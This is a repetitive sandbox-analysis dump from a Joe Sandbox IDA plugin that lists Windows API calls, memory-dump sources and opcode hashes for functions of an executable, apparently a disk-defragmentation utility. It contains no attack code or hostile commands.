                                                                                                                                                                                                                                                                                    • Opcode ID: 631ada8aa74ce3b6fe86c1b860eda6107006effdbef0132884d037a0fc17c542
                                                                                                                                                                                                                                                                                    • Instruction ID: f55cdba9153e0e1c980a4fac1fe1aa85c7dcce68075fab81bff91a96374b76ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 631ada8aa74ce3b6fe86c1b860eda6107006effdbef0132884d037a0fc17c542
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF0B275A00B41DFDB208FB8D848B82B7E4AB58715F00C82EA5AEC3611D738E480CF14
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00415489,?,?,BB40E64E,?,?,00000000,004070E8,?,BB40E64E,?,00000000,00000000), ref: 004153D0
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 004153E1
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_GetImageCount), ref: 004153FB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • ImageList_GetImageCount, xrefs: 004153F5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_GetImageCount
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-4246500564
                                                                                                                                                                                                                                                                                    • Opcode ID: dc0ca7fa63d95de86685858bef82a952b7d7d020cd01d86cad7104e1fbda7d34
                                                                                                                                                                                                                                                                                    • Instruction ID: 982047e8d717f41167e3cd9be7dffe01ffe3abe97b222393831f80d9b05f459f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc0ca7fa63d95de86685858bef82a952b7d7d020cd01d86cad7104e1fbda7d34
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08F07475601B45CFD7208F68D948A87B7E4FB58715B40892EE5AEC3A51D778E880CB08
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00403E46,?,?,BB40E64E), ref: 00403DA0
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00403DB1
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_AddMasked), ref: 00403DCB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_AddMasked
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-822293376
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000040), ref: 00423E73
                                                                                                                                                                                                                                                                                    • SetPriorityClass.KERNEL32(00000000), ref: 00423E7A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassCurrentPriorityProcess
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag$Priority
                                                                                                                                                                                                                                                                                    • API String ID: 1822496659-2550450721
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000020), ref: 00423E33
                                                                                                                                                                                                                                                                                    • SetPriorityClass.KERNEL32(00000000), ref: 00423E3A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassCurrentPriorityProcess
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag$Priority
                                                                                                                                                                                                                                                                                    • API String ID: 1822496659-2550450721
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000080), ref: 00423EB6
                                                                                                                                                                                                                                                                                    • SetPriorityClass.KERNEL32(00000000), ref: 00423EBD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClassCurrentPriorityProcess
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag$Priority
                                                                                                                                                                                                                                                                                    • API String ID: 1822496659-2550450721
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C87E
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042C88F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130A,00000000,?), ref: 0042C8C7
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042C8D2
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ClientMessageRectSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 166717107-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 0041056D
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041058D
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: GetDC.USER32(?), ref: 0041AADC
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041AAF4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041AB1C
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041AA90: ReleaseDC.USER32(?,?), ref: 0041AB37
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 004105E2
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041063B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Rect$ExtentMessagePoint32ReleaseSendText
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2970461787-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aulldiv__aullrem
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3839614884-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d3be8701daf285d51c64e253fdb0a8c1ca35a99fc3c88bc81763c7530e70c03f
                                                                                                                                                                                                                                                                                    • Instruction ID: 61ee5ff977679a68600c6b3ba5455a9d5faea7aa6e4a004e82da9cd24f1d17ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3be8701daf285d51c64e253fdb0a8c1ca35a99fc3c88bc81763c7530e70c03f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B21D2B6608351AFC310DE59D880E6BBBE8EBD9305F00495DF8849B302D275EC458BB6
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419AE0: GetModuleHandleW.KERNEL32(ntdll,NtQuerySystemInformation), ref: 00419B01
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419AE0: GetProcAddress.KERNEL32(00000000), ref: 00419B08
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 004248FF
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcSleep
                                                                                                                                                                                                                                                                                    • String ID: CPUUsageExceed$DiskDefrag\AutoDefragmention$d
                                                                                                                                                                                                                                                                                    • API String ID: 451317006-1228882529
                                                                                                                                                                                                                                                                                    • Opcode ID: 927e2202433fb9e42a6fe3e98e5b36a04668a5a885c84e3f0056aeb2df8c8ff7
                                                                                                                                                                                                                                                                                    • Instruction ID: 2aae77fe05b5572fc9a22550ba8b2e73634bf3b6c40b7b563c05c91186231963
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 927e2202433fb9e42a6fe3e98e5b36a04668a5a885c84e3f0056aeb2df8c8ff7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6021D439B102224BD724DE68DD84BE73351DFC4325F5A4279ED098F382DB66EC468299
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,00000800,?,00000000), ref: 00463572
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00463581
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,?,?,00000000), ref: 004635C1
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004635C7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ControlDeviceErrorLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2645620995-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 280114bd6b1db9933460ef4d3ecd134f68ed06276e5ba2ce953f9defbee2e827
                                                                                                                                                                                                                                                                                    • Instruction ID: 72788d8031d8da8ebdf27af98cafe7d3eb32084a5d4fa9d01f0a72895e77951c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 280114bd6b1db9933460ef4d3ecd134f68ed06276e5ba2ce953f9defbee2e827
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8711C4716003412BE3109B169C46BAB769CEBD1710F44483EF548E6151EAA8EA098BEF
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005FDEAD
                                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005FDEC6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Value___vcrt_
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1426506684-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 968c789e47ac104a089a63a3d9a647db915dc32d09b6e71ab0484a4db3cd1788
                                                                                                                                                                                                                                                                                    • Instruction ID: fb580ab6c100dca722d1fa83e6dae7c11b726cf200d352632489135a9b477385
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 968c789e47ac104a089a63a3d9a647db915dc32d09b6e71ab0484a4db3cd1788
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A801F13224831A6EB71426B56C8A97A3FBBFB52771720032AF714851F1EE294C019161
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __allrem.LIBCMT ref: 00454FE5
                                                                                                                                                                                                                                                                                    • __alldvrm.LIBCMT ref: 00454FF8
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045500B
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00455044
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm__allrem
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2089711351-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9e2e06a4a2c618b65764ecf02f880869a055206a9d0490231dd6032392fa1694
                                                                                                                                                                                                                                                                                    • Instruction ID: 1642b9dd75f3a4511d1f743995959062418e168b9dabd897861ea646df64c966
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e2e06a4a2c618b65764ecf02f880869a055206a9d0490231dd6032392fa1694
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44112AB5A00A00AFC324CF66C985D27BBE9EFC8714721C92EB59A87745D675FC40CB64
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,?), ref: 0046D047
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 0046D059
                                                                                                                                                                                                                                                                                    • SetCursor.USER32(?,?,?,?,0046CB00,?,00000000,?,?), ref: 0046D06F
                                                                                                                                                                                                                                                                                    • DestroyCursor.USER32(00000000), ref: 0046D07A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Cursor$Load$Destroy
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2883253431-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b526f51bf045ccedc4edf904a989a3b1655f38ad34df7115bdfe87dc4000c200
                                                                                                                                                                                                                                                                                    • Instruction ID: d6e58a44651a1d3402cb24b8e4ad2f5d6b0251b9aafb2ead04931a23fc49c706
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b526f51bf045ccedc4edf904a989a3b1655f38ad34df7115bdfe87dc4000c200
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E016771F142189FD730AF6AEC8096B37DCE756318F15083BE108D3211DA79A442877D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00000000), ref: 004676B7
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000403,00000003,000001F4), ref: 004676CC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000403,00000002,00001770), ref: 004676E1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,00000190), ref: 004676F6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3e2714244d5c6f65102f12cb8e05017cbdfaef3b4b34307461ffb964c10c16d6
                                                                                                                                                                                                                                                                                    • Instruction ID: 05ecc198b00069830d56908e8e3e5e7e1269b8f0e776762def572f81c0fca120
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e2714244d5c6f65102f12cb8e05017cbdfaef3b4b34307461ffb964c10c16d6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF01D717C0B027AE2309A68DC82FA7A2A86B94B02F15582DF359FB1D196B875018E58
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aulldiv
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: 89a6921c06f24090ffa03df58177ed7f9d03450d2280ec600551e15521660d28
                                                                                                                                                                                                                                                                                    • Instruction ID: d8bfd7cdfac141d9cfdb0ffece5a98f1ca78eb3dd6e2b02cd9253dc2d6ef05f2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89a6921c06f24090ffa03df58177ed7f9d03450d2280ec600551e15521660d28
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6ED137756083409FC314DF69C98092BFBE4BFC8314F05896EF99997311E739E8058BA6
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3BE
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3D1
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 885266447-2762138152
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: __aulldiv
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • SHQueryRecycleBinW.SHELL32(?,?), ref: 0042B1A8
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
